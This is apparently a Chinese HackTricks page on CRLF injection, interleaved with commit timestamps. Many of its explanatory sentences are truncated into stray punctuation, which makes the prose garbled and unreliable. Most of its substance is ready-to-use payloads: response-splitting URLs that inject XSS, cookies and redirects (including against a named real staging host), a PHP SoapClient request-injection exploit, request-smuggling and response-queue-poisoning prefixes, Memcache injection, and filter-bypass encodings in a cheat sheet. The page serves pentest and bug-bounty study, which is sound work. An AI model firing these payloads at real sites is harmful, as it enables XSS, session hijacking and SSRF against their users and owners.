2023-12-26 02:11:12 +00:00
# CRLF (%0D%0A) 注入
2022-04-28 16:01:33 +00:00
< details >
2024-02-05 20:18:17 +00:00
< summary > < strong > 从零开始学习 AWS 黑客技术,成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( < / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2023-12-31 04:43:12 +00:00
支持 HackTricks 的其他方式:
2024-02-05 20:18:17 +00:00
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
2024-02-18 14:44:30 +00:00
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群组** ](https://t.me/peass ) 或在 **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )** 上关注我们**。
* 通过向 [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github 仓库提交 PR 来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2024-02-18 14:44:30 +00:00
< figure > < img src = "../.gitbook/assets/i3.png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-05-24 00:07:19 +00:00
2024-02-18 14:44:30 +00:00
**赏金提示**: , **https://go.intigriti.com/hacktricks** ](https://go.intigriti.com/hacktricks ),开始赚取高达**$100,000**的赏金!
2022-04-28 16:01:33 +00:00
2024-02-18 14:44:30 +00:00
{% embed url="https://go.intigriti.com/hacktricks" %}
2022-05-24 00:07:19 +00:00
2024-02-05 20:18:17 +00:00
### CRLF
2020-07-15 15:43:14 +00:00
2024-02-18 14:44:30 +00:00
回车符( ) ( ) , )
2020-07-15 15:43:14 +00:00
2024-02-05 20:18:17 +00:00
### CRLF 注入漏洞
2020-07-15 15:43:14 +00:00
2024-02-18 14:44:30 +00:00
CRLF 注入涉及将 CR 和 LF 字符插入用户提供的输入中。此操作会误导服务器、应用程序或用户,使其将插入的序列解释为一个响应的结束和另一个响应的开始。虽然这些字符本身并不具有危害性,但它们的误用可能导致 HTTP 响应拆分和其他恶意活动。
2020-07-15 15:43:14 +00:00
2024-02-05 20:18:17 +00:00
### 示例:日志文件中的 CRLF 注入
2020-07-15 15:43:14 +00:00
2024-02-18 14:44:30 +00:00
[此处的示例 ](https://www.invicti.com/blog/web-security/crlf-http-header )给出了一个在管理面板中遵循格式 `IP - 时间 - 访问路径` 的日志文件条目示例:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
123.123.123.123 - 08:15 - /index.php?page=home
```
2024-02-05 20:18:17 +00:00
攻击者可以利用CRLF注入来操纵这个日志。通过在HTTP请求中注入CRLF字符, , :
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
/index.php?page=home& %0d%0a127.0.0.1 - 08:15 - /index.php?page=home& restrictedaction=edit
```
2024-02-18 14:44:30 +00:00
这里,`%0d` 和 `%0a` 代表了 CR 和 LF 的 URL 编码形式。攻击后,日志会误导性地显示:
2023-12-26 02:11:12 +00:00
```
2024-02-05 20:18:17 +00:00
IP - Time - Visited Path
2020-07-15 15:43:14 +00:00
123.123.123.123 - 08:15 - /index.php?page=home&
127.0.0.1 - 08:15 - /index.php?page=home& restrictedaction=edit
```
2024-02-18 14:44:30 +00:00
攻击者通过使恶意活动看起来像是本地主机(通常在服务器环境中受信任的实体)执行了这些操作来掩盖他们的恶意活动。服务器将以`%0d%0a`开头的查询部分解释为单个参数,而`restrictedaction`参数被解析为另一个单独的输入。操纵后的查询有效地模仿了一个合法的管理命令:`/index.php?page=home& restrictedaction=edit`
2020-07-15 15:43:14 +00:00
2024-02-05 20:18:17 +00:00
### HTTP响应拆分
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
#### 描述
2020-07-15 15:43:14 +00:00
2024-02-18 14:44:30 +00:00
HTTP响应拆分是一种安全漏洞, , ( ) ( ) , , , ( )
2020-07-15 15:43:14 +00:00
2024-02-05 20:18:17 +00:00
#### 通过HTTP响应拆分实现XSS
2020-07-15 15:43:14 +00:00
2024-02-09 08:09:21 +00:00
1. 应用程序设置一个自定义头部,如:`X-Custom-Header: UserInput`
2024-02-18 14:44:30 +00:00
2. 应用程序从查询参数中获取`UserInput`的值,比如说"user\_input"。在缺乏适当输入验证和编码的情况下,
3. 攻击者使用一个特别设计的'user\_input'来构造一个URL: < script > alert ( 'XSS' )</ script > `
* 在这个URL中, ,
2024-02-09 08:09:21 +00:00
4. 服务器在响应头部中反射攻击者的输入,导致意外的响应结构,其中恶意脚本被浏览器解释为响应主体的一部分。
2020-07-15 15:43:14 +00:00
2024-02-05 20:18:17 +00:00
#### 通过HTTP响应拆分导致重定向的示例
2020-07-15 15:43:14 +00:00
2024-02-05 20:18:17 +00:00
来自[https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62](https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62)
2020-07-15 15:43:14 +00:00
2024-02-05 20:18:17 +00:00
浏览器到:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
/%0d%0aLocation:%20http://myweb.com
```
2023-12-26 02:11:12 +00:00
服务器响应的头部为:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
Location: http://myweb.com
```
2024-01-10 06:29:36 +00:00
**其他示例:(来自** [**https://www.acunetix.com/websitesecurity/crlf-injection/** ](https://www.acunetix.com/websitesecurity/crlf-injection/ )**)**
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
http://www.example.com/somepage.php?page=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
```
2023-08-03 19:12:22 +00:00
#### 在URL路径中
2020-07-15 15:43:14 +00:00
2024-02-18 14:44:30 +00:00
您可以将**有效载荷放在URL路径中**,以控制服务器的**响应**(例如来自[这里](https://hackerone.com/reports/192667))。
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
```
2024-02-05 20:18:17 +00:00
查看更多示例:
2021-04-17 15:19:39 +00:00
2024-02-05 20:18:17 +00:00
{% embed url="https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md" %}
2021-04-17 15:20:44 +00:00
2024-02-18 14:44:30 +00:00
### HTTP 头注入
2021-04-17 15:20:44 +00:00
2024-02-18 14:44:30 +00:00
HTTP 头注入通常通过 CRLF( ) , ( ) ( ) , ,
2021-04-17 15:20:44 +00:00
2024-02-18 14:44:30 +00:00
#### 通过 HTTP 头注入利用 CORS
2021-04-17 15:20:44 +00:00
2024-02-18 14:44:30 +00:00
攻击者可以注入 HTTP 头以启用 CORS( ) ,
2021-04-17 15:19:39 +00:00
2024-02-05 20:18:17 +00:00
#### 通过 CRLF 利用 SSRF 和 HTTP 请求注入
2021-04-17 15:19:39 +00:00
2024-02-18 14:44:30 +00:00
CRLF 注入可用于构建并注入全新的 HTTP 请求。其中一个显著的示例是 PHP 的 `SoapClient` 类中的漏洞,特别是 `user_agent` 参数。通过操纵此参数,攻击者可以插入额外的头部和正文内容,甚至完全注入一个新的 HTTP 请求。以下是演示此利用的 PHP 示例:
2021-04-17 15:19:39 +00:00
```php
2023-08-03 19:12:22 +00:00
$target = 'http://127.0.0.1:9090/test';
2021-04-17 15:19:39 +00:00
$post_string = 'variable=post value';
$crlf = array(
2023-08-03 19:12:22 +00:00
'POST /proxy HTTP/1.1',
'Host: local.host.htb',
'Cookie: PHPSESSID=[PHPSESSID]',
'Content-Type: application/x-www-form-urlencoded',
'Content-Length: '.(string)strlen($post_string),
"\r\n",
$post_string
2021-04-17 15:19:39 +00:00
);
$client = new SoapClient(null,
2023-08-03 19:12:22 +00:00
array(
'uri'=>$target,
'location'=>$target,
'user_agent'=>"IGN\r\n\r\n".join("\r\n",$crlf)
)
2021-04-17 15:19:39 +00:00
);
2024-02-05 20:18:17 +00:00
# Put a netcat listener on port 9090
2021-04-17 15:19:39 +00:00
$client->__soapCall("test", []);
```
2024-02-18 14:44:30 +00:00
### 利用请求串联进行头部注入
2024-02-05 20:18:17 +00:00
有关此技术和潜在问题的更多信息[**请查看原始来源**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning)。
2020-07-15 15:43:14 +00:00
2024-02-05 20:18:17 +00:00
您可以注入必要的头部,以确保**后端在响应初始请求后保持连接打开**:
2022-10-05 09:28:25 +00:00
```
GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0a HTTP/1.1
```
2024-02-18 14:44:30 +00:00
之后,可以指定第二个请求。这种情况通常涉及[HTTP请求走私](http-request-smuggling/),这是一种技术,服务器在注入后附加的额外标头或主体元素可能导致各种安全漏洞。
2022-10-05 09:28:25 +00:00
2024-02-05 20:18:17 +00:00
**利用:**
2024-02-18 14:44:30 +00:00
1. **恶意前缀注入** : :
2022-10-05 09:28:25 +00:00
`GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/redirplz%20HTTP/1.1%0d%0aHost:%20oastify.com%0d%0a%0d%0aContent-Length:%2050%0d%0a%0d%0a HTTP/1.1`
2024-02-18 14:44:30 +00:00
2. **为响应队列毒化制作前缀** :这种方法涉及创建一个前缀,当与尾随的垃圾组合时,形成一个完整的第二个请求。这可能触发响应队列毒化。示例:
2022-10-05 09:28:25 +00:00
`GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/%20HTTP/1.1%0d%0aFoo:%20bar HTTP/1.1`
2024-02-05 20:18:17 +00:00
### Memcache注入
2023-02-16 13:29:30 +00:00
2024-02-05 20:18:17 +00:00
Memcache是一个使用明文协议的**键值存储**。更多信息请参阅:
2023-02-16 13:29:30 +00:00
{% content-ref url="../network-services-pentesting/11211-memcache/" %}
[11211-memcache ](../network-services-pentesting/11211-memcache/ )
{% endcontent-ref %}
2024-02-05 20:18:17 +00:00
**阅读完整信息请查看**[**原始报告**](https://www.sonarsource.com/blog/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/)
2024-02-09 08:09:21 +00:00
如果平台从HTTP请求中获取数据并在未经过消毒的情况下使用它来执行对**memcache**服务器的**请求**,攻击者可以利用这种行为来**注入新的memcache命令**。
2023-02-16 13:29:30 +00:00
2024-02-09 08:09:21 +00:00
例如, , ,
2023-02-16 13:29:30 +00:00
2024-02-18 14:44:30 +00:00
< figure > < img src = "../.gitbook/assets/image (6) (1) (4).png" alt = "https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/ba72cd16-2ca0-447b-aa70-5cde302a0b88/body-578d9f9f-1977-4e34-841c-ad870492328f_10.png?w=1322&h=178&auto=format&fit=crop" > < figcaption > < / figcaption > < / figure >
2023-02-16 13:29:30 +00:00
2024-02-05 20:18:17 +00:00
此外, , :
2023-02-16 13:29:30 +00:00
2024-02-18 14:44:30 +00:00
< figure > < img src = "../.gitbook/assets/image (40).png" alt = "https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/c6c1f3c4-d244-4bd9-93f7-2c88f139acfa/body-3f9ceeb9-3d6b-4867-a23f-e0e50a46a2e9_14.png?w=1322&h=506&auto=format&fit=crop" > < figcaption > < / figcaption > < / figure >
2023-06-06 21:42:32 +00:00
2024-02-18 14:44:30 +00:00
### 如何在Web应用程序中防止CRLF / HTTP标头注入
2023-06-06 22:57:49 +00:00
2024-02-05 20:18:17 +00:00
为了减轻Web应用程序中CRLF( ) , :
2023-02-16 13:29:30 +00:00
2024-02-18 14:44:30 +00:00
1. **避免在响应标头中直接使用用户输入** :最安全的方法是避免直接将用户提供的输入合并到响应标头中。
2. **对特殊字符进行编码** : , ( ( ) ( ) )
3. **更新编程语言** :
2020-07-15 15:43:14 +00:00
2024-02-05 20:18:17 +00:00
### 速查表
[从这里获取速查表 ](https://twitter.com/NinadMishra5/status/1650080604174667777 )
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
1. HTTP Response Splitting
2021-06-23 17:08:03 +00:00
• /%0D%0ASet-Cookie:mycookie=myvalue (Check if the response is setting this cookie)
2020-07-15 15:43:14 +00:00
2. CRLF chained with Open Redirect
2023-08-03 19:12:22 +00:00
• //www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2
2020-07-15 15:43:14 +00:00
• /www.google.com/%2E%2E%2F%0D%0AHeader-Test:test2
• /google.com/%2F..%0D%0AHeader-Test:test2
• /%0d%0aLocation:%20http://example.com
3. CRLF Injection to XSS
• /%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23
• /%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
4. Filter Bypass
• %E5%98%8A = %0A = \u560a
• %E5%98%8D = %0D = \u560d
• %E5%98%BE = %3E = \u563e (>)
• %E5%98%BC = %3C = \u563c (< )
• Payload = %E5%98%8A%E5%98%8DSet-Cookie:%20test
```
2023-12-16 14:32:12 +00:00
## 自动化工具
2020-09-11 09:44:53 +00:00
2023-12-16 14:32:12 +00:00
* [https://github.com/Raghavd3v/CRLFsuite ](https://github.com/Raghavd3v/CRLFsuite )
* [https://github.com/dwisiswant0/crlfuzz ](https://github.com/dwisiswant0/crlfuzz )
2020-09-11 09:44:53 +00:00
2023-08-03 19:12:22 +00:00
## 暴力破解检测列表
2021-06-27 21:56:13 +00:00
2023-12-16 14:32:12 +00:00
* [https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/crlf.txt ](https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/crlf.txt )
2021-06-27 21:56:13 +00:00
2023-08-03 19:12:22 +00:00
## 参考资料
2024-02-18 14:44:30 +00:00
2024-02-05 20:18:17 +00:00
* [**https://www.invicti.com/blog/web-security/crlf-http-header/** ](https://www.invicti.com/blog/web-security/crlf-http-header/ )
2022-04-05 22:24:52 +00:00
* [**https://www.acunetix.com/websitesecurity/crlf-injection/** ](https://www.acunetix.com/websitesecurity/crlf-injection/ )
2023-02-16 13:29:30 +00:00
* [**https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning** ](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning )
2024-02-05 20:18:17 +00:00
* [**https://www.netsparker.com/blog/web-security/crlf-http-header/** ](https://www.netsparker.com/blog/web-security/crlf-http-header/ )
2022-04-28 16:01:33 +00:00
2024-02-18 14:44:30 +00:00
< figure > < img src = "../.gitbook/assets/i3.png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-05-24 00:07:19 +00:00
2024-02-18 14:44:30 +00:00
**漏洞赏金提示**: ,
2022-05-24 00:07:19 +00:00
2024-02-18 14:44:30 +00:00
{% embed url="https://go.intigriti.com/hacktricks" %}
2022-04-28 16:01:33 +00:00
< details >
2024-02-05 20:18:17 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, < / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( ) < / strong > < / a > < strong > ! < / strong > < / summary >
2023-12-31 04:43:12 +00:00
2024-02-05 20:18:17 +00:00
支持HackTricks的其他方式:
2022-04-28 16:01:33 +00:00
2024-02-18 14:44:30 +00:00
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版本的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
2024-02-05 20:18:17 +00:00
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
2024-02-18 14:44:30 +00:00
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**。**
2024-02-05 20:18:17 +00:00
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
